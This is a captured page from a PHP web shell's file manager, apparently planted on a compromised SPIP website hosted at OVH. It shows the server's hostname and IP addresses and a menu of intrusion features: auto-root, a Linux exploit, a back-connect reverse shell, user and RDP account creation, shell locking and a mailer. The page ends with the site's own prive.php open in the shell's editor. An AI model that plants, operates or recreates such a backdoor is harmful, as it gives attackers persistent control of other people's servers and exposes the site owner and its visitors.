Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
lchg /
ecrire /
[ HOME SHELL ]
Name
Size
Permission
Action
action
[ DIR ]
drwx---r-x
auth
[ DIR ]
drwx---r-x
balise
[ DIR ]
drwx---r-x
base
[ DIR ]
drwx---r-x
charsets
[ DIR ]
drwx---r-x
exec
[ DIR ]
drwx---r-x
genie
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
install
[ DIR ]
drwx---r-x
iterateur
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
maj
[ DIR ]
drwx---r-x
notifications
[ DIR ]
drwx---r-x
plugins
[ DIR ]
drwx---r-x
public
[ DIR ]
drwx---r-x
req
[ DIR ]
drwx---r-x
src
[ DIR ]
drwx---r-x
typographie
[ DIR ]
drwx---r-x
urls
[ DIR ]
drwx---r-x
xml
[ DIR ]
drwx---r-x
inc_version.php
19
KB
-rw----r--
index.php
5.01
KB
-rw----r--
paquet.xml
11.52
KB
-rw----r--
prive.php
1.41
KB
-rw----r--
public.php
6.53
KB
-rw----r--
rien.gif
63
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : prive.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ // Script pour appeler un squelette apres s'etre authentifie include_once 'inc_version.php'; include_spip('inc/cookie'); $auth = charger_fonction('auth', 'inc'); $var_auth = $auth(); if ($var_auth !== '') { if (!is_int($var_auth)) { // si l'authentifie' n'a pas acces a l'espace de redac // c'est qu'on voulait forcer sa reconnaissance en tant que visiteur. // On reexecute pour deboucher sur le include public. // autrement on insiste if (is_array($var_auth)) { $var_auth = '../?' . $_SERVER['QUERY_STRING']; spip_setcookie('spip_session', $_COOKIE['spip_session'], [ 'expires' => time() + 3600 * 24 * 14, 'httponly' => true, ]); } include_spip('inc/headers'); redirige_formulaire($var_auth); } } // En somme, est prive' ce qui est publiquement nomme'... include 'public.php';
Close